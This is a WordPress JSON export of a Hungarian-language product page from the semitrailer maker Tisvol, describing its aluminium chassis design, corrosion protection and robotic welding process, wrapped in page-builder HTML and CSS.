{"id":15040,"date":"2019-07-11T07:27:09","date_gmt":"2019-07-11T07:27:09","guid":{"rendered":"https:\/\/tisvol.com\/chasis\/"},"modified":"2019-12-04T03:23:00","modified_gmt":"2019-12-04T03:23:00","slug":"alvaz-tisvol","status":"publish","type":"page","link":"https:\/\/tisvol.com\/hu\/hogyan-keszul\/alvaz-tisvol\/","title":{"rendered":"Alv\u00e1z"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-33yw-fe4ace012c6b9c696b8bb8b31f28441a\">\n.avia-section.av-33yw-fe4ace012c6b9c696b8bb8b31f28441a{\nbackground-color:#ffffff;\nbackground-image:unset;\n}\n<\/style>\n<div id='tisvol-tagline'  class='avia-section av-33yw-fe4ace012c6b9c696b8bb8b31f28441a main_color avia-section-default avia-no-border-styling  avia-builder-el-0  el_before_av_layout_row  avia-builder-el-first  avia-bg-style-scroll container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><main  role=\"main\" itemprop=\"mainContentOfPage\"  class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-15040'><div class='entry-content-wrapper clearfix'>\n<section  class='av_textblock_section av-jj8pzx7e-f58ee2657ad4a3ea48b2f1ff7d628b0b '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><h3 style=\"text-align: center;\">Powered by Superior Quality<\/h3>\n<\/div><\/section>\n\n<\/div><\/div><\/main><!-- close content main element --><\/div><\/div><div id='single-content-page-header'  class='av-layout-grid-container av-jtitiy8i-cb8224d08fbce2acdbc5f32c5bf0df2e entry-content-wrapper main_color av-flex-cells  avia-builder-el-2  el_after_av_section  el_before_av_section  gradient-half-grey-to-white animation-element grid-row-not-first  container_wrap sidebar_right'  >\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jtitklia-003a38b7a28449caea4e2c8d204017e2\">\n.flex_cell.av-jtitklia-003a38b7a28449caea4e2c8d204017e2{\nvertical-align:middle;\nheight:480px;\nmin-height:480px;\n}\n.responsive #top #wrap_all .flex_cell.av-jtitklia-003a38b7a28449caea4e2c8d204017e2{\npadding:0px 0px 0px 0px !important;\n}\n<\/style>\n<div class='flex_cell av-jtitklia-003a38b7a28449caea4e2c8d204017e2 av-gridrow-cell av_one_half no_margin  avia-builder-el-3  el_before_av_cell_one_half  avia-builder-el-first  content-align-middle av-zero-padding avia-full-contain'  ><div class='flex_cell_inner'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-1y9y0p-659967d3e94ffbd9c96fa4453fc050c6\">\n.flex_column.av-1y9y0p-659967d3e94ffbd9c96fa4453fc050c6{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-1y9y0p-659967d3e94ffbd9c96fa4453fc050c6 av_one_full  avia-builder-el-4  avia-builder-el-no-sibling  first flex_column_div av-zero-column-padding  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec\">\n#top .hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec{\nmargin-top:20px;\nmargin-bottom:20px;\n}\n.hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec .hr-inner{\nwidth:30px;\nborder-color:#333333;\n}\n<\/style>\n<div  class='hr av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec hr-custom  avia-builder-el-5  el_before_av_textblock  avia-builder-el-first  hr-center hr-icon-no'><span class='hr-inner inner-border-av-border-thin'><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-jj8rms6q-e378de6f514244f1a118e0085a2fbc7d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><h2 class=\"titular-principal\" style=\"text-align: center;\">ALV\u00c1Z<\/h2>\n<h4 class=\"subtitular-principal\" style=\"text-align: center;\">&#8211;\u00a0A TISVOL KIEMELKED\u0150 MIN\u0150S\u00c9GI T\u00c9NYEZ\u0150JE &#8211;<\/h4>\n<\/div><\/section><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec\">\n#top .hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec{\nmargin-top:20px;\nmargin-bottom:20px;\n}\n.hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec .hr-inner{\nwidth:30px;\nborder-color:#333333;\n}\n<\/style>\n<div  class='hr av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec hr-custom  avia-builder-el-7  el_after_av_textblock  avia-builder-el-last  hr-center hr-icon-no'><span class='hr-inner inner-border-av-border-thin'><span class=\"hr-inner-style\"><\/span><\/span><\/div><\/p><\/div>\n<\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1\">\n.flex_cell.av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1{\nvertical-align:middle;\nheight:480px;\nmin-height:480px;\nbackground:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/05\/soldadura.jpg) 100% 50% no-repeat scroll ;\n}\n.responsive #top #wrap_all .flex_cell.av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1{\npadding:0px 0px 0px 0px !important;\n}\n<\/style>\n<div class='flex_cell av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1 av-gridrow-cell av_one_half no_margin  avia-builder-el-8  el_after_av_cell_one_half  avia-builder-el-last  content-align-middle av-zero-padding avia-full-contain'  ><div class='flex_cell_inner'><\/div><\/div>\n<\/div>\n<div id='racional'  class='avia-section av-jjgvfjza-47523f58ab7c161de1e310c770dd1e1e main_color avia-section-default avia-no-border-styling  avia-builder-el-9  el_after_av_layout_row  el_before_av_submenu  gradient-grana border-top-fillet avia-bg-style-scroll av-minimum-height av-minimum-height-custom av-height-custom  container_wrap sidebar_right'   data-av_minimum_height_px='420'><div class='container av-section-cont-open' style='height:420px'><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-15040'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-5fsy-4f428072adb752bd4df234841250c4e6\">\n.flex_column.av-5fsy-4f428072adb752bd4df234841250c4e6{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-5fsy-4f428072adb752bd4df234841250c4e6 av_one_full  avia-builder-el-10  avia-builder-el-no-sibling  first flex_column_div av-zero-column-padding  '     ><section  class='av_textblock_section av-jj8rms6q-bd76de550ec01b29325c9bd44a0927a3 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock somos-capaces'  itemprop=\"text\" ><p style=\"text-align: center;\">Kiz\u00e1r\u00f3lag maxim\u00e1lis min\u0151s\u00e9get ny\u00fajtunk<\/p>\n<\/div><\/section><\/div>\n\n<\/div><\/div><\/div><!-- close content main div --><\/div><\/div><div id='sub_menu1'  class='av-submenu-container av-jqz6x91q-d7622458eff02305cba2ea0313b5a133 socket_color  avia-builder-el-12  el_after_av_section  el_before_av_section  submenu-not-first container_wrap sidebar_right' style='z-index:301' ><div class='container av-menu-mobile-disabled av-submenu-pos-center'><ul id='av-custom-submenu-1' class='av-subnav-menu' role='menu'>\n<li class='menu-item av-av_submenu_item-71bd4e9eb6af00269f75b7f33597d8b2 menu-item-top-level menu-item-top-level-1' role='menuitem'><a href='#chasis-tisvol'  ><span class='avia-bullet'><\/span><span class='avia-menu-text'>A TISVOL ALV\u00c1Z<\/span><\/a><\/li>\n<li class='menu-item av-av_submenu_item-decf206e93ef89231ecd83dc01f5d02f menu-item-top-level menu-item-top-level-2' role='menuitem'><a href='#sistemacontructivo'  ><span class='avia-bullet'><\/span><span class='avia-menu-text'>\u00c9P\u00cdT\u00c9SI RENDSZER<\/span><\/a><\/li>\n<\/ul><\/div><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de\">\n.avia-section.av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/04\/tisvol-chasis-comunes-chasis-1300.jpg);\nbackground-position:50% 50%;\nbackground-attachment:scroll;\n}\n.avia-section.av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de .av-section-color-overlay{\nopacity:0.8;\nbackground-color:#ffffff;\n}\n<\/style>\n<div id='chasis-tisvol'  class='avia-section av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de main_color avia-section-large avia-no-border-styling  avia-builder-el-13  el_after_av_submenu  el_before_av_section  border-top-fillet animation-element avia-full-contain avia-bg-style-scroll av-section-color-overlay-active av-minimum-height av-minimum-height-100 av-height-100  container_wrap sidebar_right'  data-section-bg-repeat='contain' data-av_minimum_height_pc='100' data-av_min_height_opt='100'><div class=\"av-section-color-overlay-wrap\"><div class=\"av-section-color-overlay\"><\/div><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-15040'><div class='entry-content-wrapper clearfix'>\n<div class='flex_column_table av-3zju-0c6870679c2b684b020567490d13dd7a sc-av_one_full av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-0c6870679c2b684b020567490d13dd7a\">\n.flex_column.av-3zju-0c6870679c2b684b020567490d13dd7a{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-0c6870679c2b684b020567490d13dd7a av_one_full  avia-builder-el-14  el_before_av_one_half  avia-builder-el-first  appear-from-bottom first flex_column_table_cell av-equal-height-column av-align-top  '     ><section  class='av_textblock_section av-jkdqein2-bf1f083bfb68ea2de0458ea6ccc99a28 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock fade-in special-content-page-heading'  itemprop=\"text\" ><h2>A TISVOL ALV\u00c1Z<\/h2>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 --><div class='flex_column_table av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb sc-av_one_half av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb\">\n.flex_column.av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb av_one_half  avia-builder-el-16  el_after_av_one_full  el_before_av_one_half  appear-from-left first no_margin flex_column_table_cell av-equal-height-column av-align-top  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-8fd12ab25be9521be479acde33e03210 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-left'  itemprop=\"text\" ><h4>A legig\u00e9nyesebb alv\u00e1z a f\u00e9lp\u00f3tkocsik k\u00f6z\u00f6tt<\/h4>\n<p>Saj\u00e1t gy\u00e1rtm\u00e1ny\u00fa alv\u00e1zunk a legjobb min\u0151s\u00e9g\u0171 nyersanyagb\u00f3l \u00e9s olyan innovat\u00edv technol\u00f3gi\u00e1val k\u00e9sz\u00fcl, mely val\u00f3sz\u00edn\u0171leg a legjobb alum\u00ednium-alv\u00e1zat biztos\u00edtja a piacon.<\/p>\n<h4>DS-1 k\u00e9t darabb\u00f3l \u00e1ll\u00f3 alv\u00e1z-hossztart\u00f3 modell<\/h4>\n<p>Egyetlenegy hosszanti hegeszt\u00e9si s\u00e1v, az alapanyagot gyeng\u00edt\u0151 keresztir\u00e1ny\u00fa hegeszt\u00e9sek n\u00e9lk\u00fcl. Ennek k\u00f6sz\u00f6nhet\u0151en a T-elemek mindig teljes eg\u00e9szek, told\u00e1sok n\u00e9lk\u00fcl.<\/p>\n<h4>Alv\u00e1zszerkezet<\/h4>\n<p>Az alv\u00e1z kompakt szerkezete a kereszt- \u00e9s a hosszgerend\u00e1k k\u00f6zti egyes\u00edt\u00e9sek meger\u0151s\u00edt\u00e9s\u00e9vel ellen\u00e1ll\u00f3bb\u00e1 teszi az alv\u00e1z egy\u00fcttes\u00e9t.<\/p>\n<h4>Coroa alv\u00e1z<\/h4>\n<p>A billent\u0151s j\u00e1rm\u0171vek legalacsonyabb egyenes alv\u00e1za a piacon 1400 mm-es sz\u00e9less\u00e9ggel, mely n\u00f6veli a stabilit\u00e1st \u00e9s garant\u00e1lja a biztons\u00e1got. [<a href=\"https:\/\/tisvol.com\/hu\/coroa\/\">Tov\u00e1bbi inform\u00e1ci\u00f3 a Coro\u00e1r\u00f3l<\/a>]<\/p>\n<h4>A hossztart\u00f3k k\u00f6zti maxim\u00e1lis t\u00e1vols\u00e1g 1400 mm.<\/h4>\n<p>A nagyobb sz\u00e9less\u00e9g mind vezet\u00e9s, mind pedig billent\u00e9s k\u00f6zben nagyobb stabilit\u00e1st biztos\u00edt.<\/p>\n<h4>A hossz\u00fa j\u00e1rm\u0171vekn\u00e9l hatty\u00fanyakas alv\u00e1z<\/h4>\n<p>A Coroa opci\u00f3t nem tartalmaz\u00f3 modellek eset\u00e9ben a hatt\u00fanyak ny\u00fajthatja a megold\u00e1st. Cs\u00f6kken a szabad magass\u00e1g, ami el\u0151nyt jelent, b\u00e1r a szerkezet h\u00e1tr\u00e1nyosan hat az \u00f6ns\u00falyra.<\/p>\n<h4>Alv\u00e1z k\u00f6zponti munkahengerekkel<\/h4>\n<p>Integr\u00e1lt pajzsok \u00e9s testreszabott kialak\u00edt\u00e1s a teheraut\u00f3-gy\u00e1rt\u00f3k r\u00e9sz\u00e9re. Az ac\u00e9lkarossz\u00e9ria-gy\u00e1rt\u00f3 rendelkez\u00e9s\u00e9re bocs\u00e1tjuk minden tud\u00e1sunkat.<\/p>\n<h4>Aggasztja a rozsd\u00e1sod\u00e1s?<\/h4>\n<p>Arra t\u00f6reksz\u00fcnk, hogy megold\u00e1st ny\u00fajtsunk erre a mindennapos probl\u00e9m\u00e1ra: Dacromet bevonattal ell\u00e1tott csavarok.<\/p>\n<h4>A k\u00fcl\u00f6nb\u00f6z\u0151 f\u00e9manyagok \u201e\u00e9rintkez\u00e9se\u201d \u00e1ltal kialakul\u00f3 galvanikus korr\u00f3zi\u00f3.<\/h4>\n<p>A megel\u0151z\u00e9s \u00e9rdek\u00e9ben egy szigetel\u0151anyagot haszn\u00e1lunk, ami megakad\u00e1lyozza a korr\u00f3zi\u00f3t. Ez\u00e1ltal hosszabb \u00e9lettartam \u00e9rhet\u0151 el optim\u00e1lis \u00e1llapotban.<\/p>\n<h4>F\u00e9kpr\u00f3ba<\/h4>\n<p>K\u00e9szen \u00e1ll a f\u00e9kez\u00e9s szimul\u00e1ci\u00f3inak elv\u00e9gz\u00e9s\u00e9re terhelt \u00e1llapotban \u00e9s garant\u00e1lja term\u00e9keink abszol\u00fat funkcionalit\u00e1s\u00e1t.<\/p>\n<h4>Minden j\u00e1rm\u0171vet ker\u00e9kanya-sapk\u00e1val ell\u00e1tva adunk \u00e1t<\/h4>\n<p>Emellett adunk egy eredeti tartal\u00e9kegys\u00e9geket tartalmaz\u00f3 dobozt.<\/p>\n<h4>Made in EU<\/h4>\n<p>A Tisvol \u00e1ltal gy\u00e1rtott \u00f6sszes j\u00e1rm\u0171 eur\u00f3pai j\u00f3v\u00e1hagy\u00e1s alapj\u00e1n k\u00e9sz\u00fclt, mely gyakorlatilag a vil\u00e1g legt\u00f6bb orsz\u00e1g\u00e1ban \u00e9rv\u00e9nyes.<\/p>\n<h4>Tudjon meg t\u00f6bbet a l\u00f6kh\u00e1r\u00edt\u00f3k magass\u00e1g\u00e1r\u00f3l<\/h4>\n<p>A j\u00e1rm\u0171, a hossz\u00e1t\u00f3l f\u00fcgg\u0151en, a jogszab\u00e1lyoknak megfelel\u0151en felhajthat\u00f3 l\u00f6kh\u00e1r\u00edt\u00f3val van felszerelve, a talajszinthez viszony\u00edtva k\u00fcl\u00f6nb\u00f6z\u0151 magass\u00e1gban, aszerint, hogy a felf\u00fcggeszt\u00e9s emelked\u0151\/lejt\u0151, vagy kih\u00fazhat\u00f3 l\u00f6kh\u00e1r\u00edt\u00f3 a talajhoz k\u00e9pest r\u00f6gz\u00edtett magass\u00e1ggal.<\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-d09ed2c056e5c75d8de462082072c956\">\n.flex_column.av-3zju-d09ed2c056e5c75d8de462082072c956{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-d09ed2c056e5c75d8de462082072c956 av_one_half  avia-builder-el-18  el_after_av_one_half  avia-builder-el-last  appear-from-right no_margin flex_column_table_cell av-equal-height-column av-align-top  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-ee8beee1f925de83bae751ed1fa0b06e '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-right'  itemprop=\"text\" ><h4>Aszfaltkivitel<\/h4>\n<p>A tengelyt v\u00e9d\u0151 ac\u00e9llemezekb\u0151l \u00e9s a felhajthat\u00f3 s\u00e1rv\u00e9d\u0151b\u0151l \u00e1ll, amely nem kapcsol\u00f3dik az aszfaltg\u00e9phez, \u00e9s v\u00e9di a jelz\u0151l\u00e1mp\u00e1kat \u00e9s a speci\u00e1lis, 200\u00b0C-ig alkalmas k\u00e9k gumit\u00f6m\u00edt\u00e9st.<\/p>\n<h4>A fel\u00fcletkezel\u00e9sek alapvet\u0151ek<\/h4>\n<p>A Tisvol olyan exkluz\u00edv befejez\u0151 m\u0171veletekkel rendelkezik, mint az alv\u00e1z orrmerev\u00edt\u0151je, \u00e9s sok m\u00e1s egyedi r\u00e9szlet.<\/p>\n<p>Mint p\u00e9ld\u00e1ul a l\u00f6kh\u00e1r\u00edt\u00f3 rudj\u00e1nak has\u00edt\u00e9k\u00e1ba illesztett t\u00f6m\u00edt\u0151gumi: A kis r\u00e9szletekben rejlik a kiv\u00e1l\u00f3s\u00e1g. Megel\u0151zz\u00fck az esetleges baleseteket az\u00e1ltal, hogy megakad\u00e1lyozzuk, hogy az anyag a kirakod\u00e1s sor\u00e1n a r\u00e9sekbe ker\u00fclj\u00f6n, majd pedig a f\u00e9lp\u00f3tkocsi mozg\u00e1sakor m\u00e1s j\u00e1rm\u0171re pattanjon.<\/p>\n<h4>A tengelyemel\u0151k automatiz\u00e1l\u00e1sa<\/h4>\n<p>Az EBS mentes\u00edt a bonyolult emel\u00e9si m\u0171veletek elv\u00e9gz\u00e9se al\u00f3l<\/p>\n<h4>\u00daj l\u00f6kh\u00e1r\u00edt\u00f3-tart\u00f3<\/h4>\n<p>Egy k\u00f6nnyebb tart\u00f3szerkezet, amely von\u00f3horog funkci\u00f3t is tartalmaz.<\/p>\n<h4>Sz\u00ednk\u00f3d pneumatikus telep\u00edt\u00e9shez<\/h4>\n<p>A vizu\u00e1lis k\u00f3ddal k\u00f6nnyebb \u00e9s gyorsabb az esetleges hib\u00e1k vagy probl\u00e9m\u00e1k megold\u00e1sa.<\/p>\n<h4>Dupla s\u00ednrendszer a hatty\u00fanyakas karossz\u00e9ria eset\u00e9ben<\/h4>\n<p>Egy dupla korcsolya haszn\u00e1lat\u00e1val megk\u00f6nny\u00edti a billencs leereszked\u00e9s\u00e9t a hatty\u00fanyakas j\u00e1rm\u0171vekn\u00e9l.<\/p>\n<h4>Tart\u00f3szerkezetek<\/h4>\n<p>Minden eszk\u00f6zh\u00f6z, bele\u00e9rtve a targonc\u00e1t is, rendelkez\u00fcnk tart\u00f3szerkezettel.<\/p>\n<h4>Rendeletek<\/h4>\n<p>Az EK-rendelet szerinti k\u00f6telez\u0151 ragaszt\u00f3kkal.<\/p>\n<h4>Felhajthat\u00f3 oldals\u00f3 al\u00e1fut\u00e1sg\u00e1tl\u00f3<\/h4>\n<p>Teljes \u00e9s k\u00e9nyelmes hozz\u00e1f\u00e9r\u00e9s az alv\u00e1z belsej\u00e9ben l\u00e9v\u0151 anyagokhoz.<\/p>\n<h4>Felf\u00fcggesztett keresztrudak<\/h4>\n<p>Alapfelszerel\u00e9sk\u00e9nt maxim\u00e1lis meger\u0151s\u00edt\u00e9s, ami off-road jellemz\u0151kkel rendelkez\u0151 fut\u00f3m\u0171vet hoz l\u00e9tre.<\/p>\n<h4>Mos\u00f3berendez\u00e9s<\/h4>\n<p>A j\u00e1rm\u0171 a c\u00e9g k\u00e9pm\u00e1sa, ez\u00e9rt olyan eszk\u00f6z\u00f6ket bocs\u00e1tunk rendelkez\u00e9sre, amelyekkel mindig k\u00f6nnyen tiszt\u00e1n tarthat\u00f3.<\/p>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n\n<\/div><\/div><\/div><!-- close content main div --><\/div><\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2\">\n.avia-section.av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/05\/tisvol-sistema-constructivo-chasis.jpg);\nbackground-position:50% 50%;\nbackground-attachment:scroll;\n}\n.avia-section.av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2 .av-section-color-overlay{\nopacity:0.8;\nbackground-color:#ffffff;\n}\n<\/style>\n<div id='sistemacontructivo'  class='avia-section av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2 main_color avia-section-large avia-no-border-styling  avia-builder-el-20  el_after_av_section  avia-builder-el-last  avia-full-stretch avia-bg-style-scroll av-section-color-overlay-active av-minimum-height av-minimum-height-100 av-height-100  container_wrap sidebar_right'  data-section-bg-repeat='stretch' data-av_minimum_height_pc='100' data-av_min_height_opt='100'><div class=\"av-section-color-overlay-wrap\"><div class=\"av-section-color-overlay\"><\/div><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-15040'><div class='entry-content-wrapper clearfix'>\n<div class='flex_column_table av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3 sc-av_one_full av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3\">\n.flex_column.av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3 av_one_full  avia-builder-el-21  el_before_av_one_half  avia-builder-el-first  animation-element first flex_column_table_cell av-equal-height-column av-align-top  '     ><section  class='av_textblock_section av-jkdqein2-bf1f083bfb68ea2de0458ea6ccc99a28 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock fade-in special-content-page-heading'  itemprop=\"text\" ><h2>\u00c9P\u00cdT\u00c9SI RENDSZER<\/h2>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 --><div class='flex_column_table av-3zju-73960d72dd19bec1e29accf37b25eaa7 sc-av_one_half av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-73960d72dd19bec1e29accf37b25eaa7\">\n.flex_column.av-3zju-73960d72dd19bec1e29accf37b25eaa7{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-73960d72dd19bec1e29accf37b25eaa7 av_one_half  avia-builder-el-23  el_after_av_one_full  el_before_av_one_half  animation-element first no_margin flex_column_table_cell av-equal-height-column av-align-middle  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-b59bf68f7a15f993915c422c36374652 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><h4>A hosszgerend\u00e1k gy\u00e1rt\u00e1sa<\/h4>\n<p>V\u00e1g\u00e1s \u00e9s csatlakoz\u00e1s, folyamatos hegeszt\u00e9s<\/p>\n<h4>Az alv\u00e1z szerel\u00e9se<\/h4>\n<p>Minden elem a hely\u00e9n, a hossz\u00fas\u00e1gt\u00f3l f\u00fcgg\u0151en minden j\u00f3l van elosztva, egy kompakt \u00e9s rugalmas szerkezetet alkotva.<\/p>\n<h4>A tengelyek l\u00e9zeres illeszt\u00e9se<\/h4>\n<p>El\u0151seg\u00edti az optim\u00e1lis gurul\u00e1st, \u00e9s ezt a jellemz\u0151j\u00e9t \u00fcgyfeleink is kiemelik.<\/p>\n<h4>Kuka, a robotunk prec\u00edzi\u00f3ja fel\u00fclm\u00falhatatlan<\/h4>\n<p>Az alv\u00e1zon dolgozik, hogy biztos\u00edtsa a t\u00f6k\u00e9letes illeszt\u00e9st \u00e9s optimaliz\u00e1lja a vezet\u00e9si k\u00e9nyelmet.<\/p>\n<h4>A robotok v\u00e9gzik az alv\u00e1z hegeszt\u00e9s\u00e9t<\/h4>\n<p>Minden t\u00edpus\u00fa mozg\u00e1s kivitelez\u00e9s\u00e9re alkalmasak, biztos\u00edtva ez\u00e1ltal, hogy a hegeszt\u00e9s nyom\u00e1sa \u00e9s sebess\u00e9ge \u00e1lland\u00f3 legyen. Ennek k\u00f6sz\u00f6nhet\u0151en a fel\u00fcletkezel\u00e9s utol\u00e9rhetetlen.<\/p>\n<h4>Forgatjuk az alv\u00e1zat<\/h4>\n<p>Ez\u00e1ltal nagyobb mozg\u00e1sszabads\u00e1got biztos\u00edtunk a robotoknak. \u00cdgy hib\u00e1tlan munk\u00e1t tudnak v\u00e9gezni.<\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-85231ba60808b4e0963870b43b252976\">\n.flex_column.av-3zju-85231ba60808b4e0963870b43b252976{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-85231ba60808b4e0963870b43b252976 av_one_half  avia-builder-el-25  el_after_av_one_half  avia-builder-el-last  animation-element no_margin flex_column_table_cell av-equal-height-column av-align-middle  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-b59bf68f7a15f993915c422c36374652 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><h4>A kir\u00e1lycsap k\u00f6rk\u00f6r\u00f6s hegeszt\u00e9s\u00e9nek automatiz\u00e1l\u00e1sa a kis<\/h4>\n<p>m\u00e9ret miatt nagyon bonyolult. Azonban szeretj\u00fck a kih\u00edv\u00e1sokat, \u00e9s ezt siker\u00fclt megoldanunk.<\/p>\n<h4>Galvanikus korr\u00f3zi\u00f3<\/h4>\n<p>Ennek megel\u0151z\u00e9s\u00e9hez egy szigetel\u0151 r\u00e9teget alkalmazunk a k\u00fcl\u00f6nb\u00f6z\u0151 f\u00e9mek (alum\u00ednium \u00e9s ac\u00e9l) k\u00f6z\u00f6tt, p\u00e9ld\u00e1ul a tengelytart\u00f3k r\u00f6gz\u00edt\u00e9s\u00e9n\u00e9l, a munkahenger tart\u00f3j\u00e1n\u00e1l stb.<\/p>\n<h4>Az ut\u00f3\u00e9rt\u00e9kes\u00edt\u00e9sre is gondolunk<\/h4>\n<p>A leng\u00e9scsillap\u00edt\u00f3k sorozatsz\u00e1ma j\u00f3l l\u00e1that\u00f3. Befektet\u00e9seket v\u00e9gz\u00fcnk annak \u00e9rdek\u00e9ben, hogy az \u00d6n j\u00f6v\u0151beli munk\u00e1ja k\u00e9nyelmesebb legyen.<\/p>\n<h4>A sz\u00fcks\u00e9gtelen megsz\u00fcntet\u00e9se<\/h4>\n<p>Az \u00e9rdes sz\u00e9lek kik\u00fcsz\u00f6b\u00f6l\u00e9se a felhaszn\u00e1l\u00e1si profilokban \u00e9s elemek k\u00f6z\u00f6tt, minden sima, mint a selyem.<\/p>\n<h4>A megb\u00edzhat\u00f3s\u00e1g gyakorlat k\u00e9rd\u00e9se<\/h4>\n<p>Annak ellen\u00e9re, hogy a tengelygy\u00e1rt\u00f3 garant\u00e1lja, ism\u00e9telten ellen\u0151rz\u00fcnk minden egyes megh\u00faz\u00e1si nyomat\u00e9kot, hogy meggy\u0151z\u0151dj\u00fcnk arr\u00f3l, hogy az optim\u00e1lis. Mindent, amit csak lehet megtesz\u00fcnk \u00fcgyfeleink biztons\u00e1g\u00e1\u00e9rt.<\/p>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 --><\/div><\/div><\/div><!-- close content main div --><\/div><\/div><\/div><div id='after_section_4'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div 